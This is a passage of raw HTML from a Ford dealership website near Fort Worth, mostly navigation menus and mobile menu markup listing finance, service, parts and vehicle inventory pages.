hRgzBD"><a href="https://www.5starford.com/finance-itin/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">En Espanol</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/finance-first-time-buyer/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">First Time Buyer</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/finance-credit-restart/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Credit Restart</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/college-graduates-students/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">College Graduates &amp; Students</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/ford-vehicle-exchange-program-near-fort-worth-tx/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Vehicle Exchange Program</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://5starford.worktrucksolutions.com/" target="_blank" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Work Trucks</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava lgshOj" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://5starford.worktrucksolutions.com/?utm_source=retailsite&amp;#038;utm_medium=linkrec&amp;#038;utm_campaign=mainnav&amp;#038;utm_term=worktrucks" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">New Work Trucks</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/commercial-sales/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Commercial Department</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/used-commercial/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Used Commercial</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/community-network/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Credit Unions</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/commercial-repair/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Commercial Repair</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/parts-center/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Parts</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava lgshOj" color="!desktopHeaderMenuFlyoutTextColor" direction="right"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/parts-center/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Parts Department</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://parts.ford.com/5star" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Order Parts</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/accessories/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Accessories</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/tire-finder/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Tire Finder</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="http://www.fordcollection.com/location/5Star" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Apparels &amp; Gifts</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/service-center/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Service</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava gNalhz" color="!desktopHeaderMenuFlyoutTextColor" direction="left"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/service-center/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Service Department</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/service-appointment/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Schedule Service</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/service-specials/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Coupons</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/sync/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ford SYNC</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/askatech-question/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ask a Tech</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/collision-center/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">Collision</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava gNalhz" color="!desktopHeaderMenuFlyoutTextColor" direction="left"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/collision-center/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Collision Center</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/collision-estimate-form/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Collision Estimate Form</div></a></div></div></div><div class="sc-AnqlK menu-item-has-children menu-item sc-hcnlBt fnTrKJ"><a href="https://www.5starford.com/about-us/" target="" class="sc-gJqsIT sc-kDhYZr fMRSaM"><div class="sc-AnqlK menu-entry-text sc-bvTASY eYoIVe">About</div></a><div class="sc-AnqlK sc-sPYgB menu-group sc-dHIava gNalhz" color="!desktopHeaderMenuFlyoutTextColor" direction="left"><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/about-us/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">About Us</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/our-team/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Staff</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/hours-directions/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Hours/Directions</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/contact-us/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Contact Us</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/awards/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Awards</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/triple-crown-meaning/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Triple Crown</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/community-network/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Community Network</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://www.5starford.com/video-gallery/" target="" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Ford Video Gallery</div></a></div><div class="sc-AnqlK menu-item sc-bSbAYC hRgzBD"><a href="https://sites.hireology.com/sampackautogroup" target="_blank" class="sc-gJqsIT sc-kDhYZr iEPPJp"><div class="sc-AnqlK menu-entry-text sc-bvTASY kaCcHN">Join Our Team</div></a></div></div></div></nav></div></div></div></div></div><div class="sc-cXHFlN hBTKjV sc-dCaJBF eHgxNt" data-jzlbind-class="'sc-cXHFlN hBTKjV ' + (h('panels.activePanel') == 'footer-favorites' ? 'bottom-open' : '')"><div class="sc-ihiiSJ fWsvHk"><a href="tel:(817) 498-8838" color="#212121" class="sc-fdqjUm jMCyAT"><svg fill="rgb(255, 255, 255)" width="24" height="24" viewBox="0 0 24 24"><path d="M0 0h24v24H0z" fill="none"></path><path d="M6.62 10.79c1.44 2.83 3.76 5.14 6.59 6.59l2.2-2.2c.27-.27.67-.36 1.02-.24 1.12.37 2.33.57 3.57.57.55 0 1 .45 1 1V20c0 .55-.45 1-1 1-9.39 0-17-7.61-17-17 0-.55.45-1 1-1h3.5c.55 0 1 .45 1 1 0 1.25.2 2.45.57 3.57.11.35.03.74-.25 1.02l-2.2 2.2z"></path></svg></a><a href="/hours-directions" color="#424242" class="sc-fdqjUm gtkuaD"><svg fill="rgb(255, 255, 255)" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2C8.13 2 5 5.13 5 9c0 5.25 7 13 7 13s7-7.75 7-13c0-3.87-3.13-7-7-7zm0 9.5c-1.38 0-2.5-1.12-2.5-2.5s1.12-2.5 2.5-2.5 2.5 1.12 2.5 2.5-1.12 2.5-2.5 2.5z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg></a><a href="/service-appointment" color="#616161" class="sc-fdqjUm WnDmE"><svg fill="rgb(255, 255, 255)" width="20" height="20" viewBox="0 0 24 24"><path clip-rule="evenodd" d="M0 0h24v24H0z" fill="none"></path><path d="M22.7 19l-9.1-9.1c.9-2.3.4-5-1.5-6.9-2-2-5-2.4-7.4-1.3L9 6 6 9 1.6 4.7C.4 7.1.9 10.1 2.9 12.1c1.9 1.9 4.6 2.4 6.9 1.5l9.1 9.1c.4.4 1 .4 1.4 0l2.3-2.3c.5-.4.5-1.1.1-1.4z"></path></svg></a><a color="#757575" data-jzlbind-tap=" (function() { var isActivePanel = h('panels.activePanel') == 'footer-favorites'; var barsState = isActivePanel ? { activeBars: h('bars.prevActiveBars'), prevActiveBars: [], } : { prevActiveBars: h('bars.activeBars'), activeBars: [], }; jzlMergeState({ panels: { activePanel: isActivePanel ? '' : 'footer-favorites' }, bars: barsState, 'sideRailState': { page: h('cognito.any_vehicles_selected') ? 'shop' : 'account' }, }) })() " class="sc-fdqjUm hSOYsj"><svg fill="rgb(255, 255, 255)" width="24" height="24" viewBox="0 0 24 24"><path d="M0 0h24v24H0z" fill="none"></path><path d="M12 17.27L18.18 21l-1.64-7.03L22 9.24l-7.19-.61L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21z"></path><path d="M0 0h24v24H0z" fill="none"></path></svg><div class="sc-dchYKM dHrjUP"><div class="sc-hAXbOi byBKp sc-gAmQfK iNYjOK" data-jzlbind-class="'sc-hAXbOi byBKp ' + ('type-' + h('cognito.notification_dot_type'))"><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></div></a></div><div class="sc-gJTSre hveJag"><div class="sc-gcJTYu hhIFZK buttons-4 sc-eomEcv iPunuC" data-jzlbind-class="'sc-gcJTYu hhIFZK ' + ('buttons-' + (4 + 0))" role="button" tabindex="0" data-jzlbind-tap=" (function () { if (window.bodyScrollLock != null) { window.bodyScrollLock.clearAllBodyScrollLocks(); } jzlMergeState({ panels: { activePanel: '' }, bars: { activeBars: h('bars.prevActiveBars'), prevActiveBars: [] } }); })() "><div class="material-icons undefined sc-cCVOAp kORqiw" color="white">clear</div></div></div></div><div class="hide-atf uxbars_panels sc-bhlBdH jsRDRB"><div class="sc-esExBO gNtFqn hidden hiddenLeft sc-dWcDbm fMVLCo" data-jzlbind-class="'sc-esExBO gNtFqn ' + ((h('bars.activeBars').map(function(x) { return x(); }).filter(function(x) { return x != null; }).join(' ')) + ' ' + ((h('panels.activePanel') == 'site-menu') ? '' : (h('panels.activePanel') == 'search-panel') ? 'hidden hiddenLeft' : (true) ? 'hidden hiddenLeft' : ''))"><div class="sc-csZoYU bNxQUf sc-ctwKVn bjLtsj" data-jzlbind-class="'sc-csZoYU bNxQUf ' + (h('panels.hasChanged') === true ? 'hasChanged' : '')" id="site-menu"><div class="sc-dAOnuy jaMvjW"><div class="sc-jtHxuu cQNFpP"><div class="site-menu_scrollable sc-MYvYT QqKeG active sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2154 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'nav_menu__1':{secondLevelOpenIds: {'2155': !h('nav_menu__1.secondLevelOpenIds.2155')}}})" class="sc-jPPmml gazMdH"><span class="sc-bIKvTM bKwUAo">All Ford Models</span><span data-jzlbind-class="h('nav_menu__1.secondLevelOpenIds.2155') ? 'arrow up' : 'arrow down'" class="sc-dNoQZL etnqDb"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M14.83 30.83l9.17-9.17 9.17 9.17 2.83-2.83-12-12-12 12z"></path><path d="M0 0h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/new-vehicles/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">All Ford Models</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/c-max" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">C-MAX Hybrid</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/new-vehicles/models=Ford_Ecosport" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Ecosport</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/f-150" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">F-150</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/fiesta" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Fiesta</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/escape" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Escape</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/super-duty" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Super Duty</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/focus" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Focus</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/edge" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Edge</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/new-vehicles/models=Ford_Ranger" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Ranger</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/fusion" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Fusion</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/flex" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Flex</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://5starford.worktrucksolutions.com/?bodyTypes=Cargo_Van,Van_Upfit" target="_blank" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Transit Cargo Van</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/mustang" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Mustang</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/explorer" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Explorer</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://5starford.worktrucksolutions.com/Transit%20Connect" target="_blank" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Transit Connect</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/taurus" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Taurus</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://www.5starford.com/inventory/expedition" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Expedition</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2155') ? 'active' : '')"><a href="https://5starford.worktrucksolutions.com/Passenger_Wagon" target="_blank" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Transit Wagon</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/just-reduced/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Just Reduced</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/lifted-trucks/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Lifted Trucks</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/new-vehicles/text=raptor+sort=_score,desc,,display_price,asc" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Raptor</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://5starford.worktrucksolutions.com/?utm_source=retailsite&amp;#038;utm_medium=linkrec&amp;#038;utm_campaign=mainnav&amp;#038;utm_term=worktrucks" target="_blank" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Work Trucks</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://5starford.worktrucksolutions.com/?utm_source=retailsite&amp;#038;utm_medium=linkrec&amp;#038;utm_campaign=mainnav&amp;#038;utm_term=new" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">New Work Trucks</span></a></div><div class="sc-RmnOB eUKhpK"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({'nav_menu__1':{secondLevelOpenIds: {'2277': !h('nav_menu__1.secondLevelOpenIds.2277')}}})" class="sc-jPPmml gazMdH"><span class="sc-bIKvTM bKwUAo">Research</span><span data-jzlbind-class="h('nav_menu__1.secondLevelOpenIds.2277') ? 'arrow up' : 'arrow down'" class="sc-dNoQZL etnqDb"><svg fill="rgb(255, 255, 255)" viewBox="0 0 48 48" width="20" height="48"><path d="M14.83 30.83l9.17-9.17 9.17 9.17 2.83-2.83-12-12-12 12z"></path><path d="M0 0h48v48h-48z" fill="none"></path></svg></span></span></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/research/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Research</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/ford-truck-center-near-fort-worth-tx" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Ford Truck Center</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/all-new-2019-ford-ranger-in-fort-worth-tx/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">2019 Ford Ranger</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/ford-f150-and-super-duty-near-dallas-tx" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">2018 Ford F-150 &amp; Super Duty</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/buy-or-lease-the-first-ever-ford-ecosport-near-dallas-tx/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">2018 Ford EcoSport</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/2018-ford-expedition-for-sale-in-dallas-tx/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">2018 Ford Expedition</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/college-graduates-students/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">College Graduates &amp; Students</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/ford-vehicle-exchange-program-near-fort-worth-tx/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Vehicle Exchange Program</span></a></div><div class="sc-cnTzU ibfPGm sc-eweMDZ entwBX" data-jzlbind-class="'sc-cnTzU ibfPGm ' + (h('nav_menu__1.secondLevelOpenIds.2277') ? 'active' : '')"><a href="https://www.5starford.com/video-gallery/" target="" role="button" tabindex="0" class="sc-dXLFzO hSJIOj"><span class="sc-eQGPmX gSnumd">Ford Video Gallery</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/choose-specialist/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Choose Your Product Specialist</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/value-your-trade/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Value Your Trade</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/sync-owners-clinics/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">SYNC Owner's Clinics</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/ford-vehicle-exchange-program-near-fort-worth-tx/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Vehicle Exchange Program</span></a></div></div><div class="site-menu_scrollable sc-MYvYT QqKeG sc-gQNndl jNxOgc" data-jzlbind-class="'site-menu_scrollable sc-MYvYT QqKeG ' + (h('nav_menu__1.firstLevelSelectedId') == 2187 ? 'active' : '')"><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/used-vehicles-merged/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Search Inventory</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/certified-pre-owned/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">Certified Used Cars</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/new-arrivals/" target="" role="button" tabindex="0" class="sc-igwadP sc-ckYZGd esuVrC"><span class="sc-bIKvTM bKwUAo">New Arrivals</span></a></div><div class="sc-RmnOB eUKhpK"><a href="https://www.5starford.com/inventory/used-cars-for-sale-under-5000/" target="" role="button" 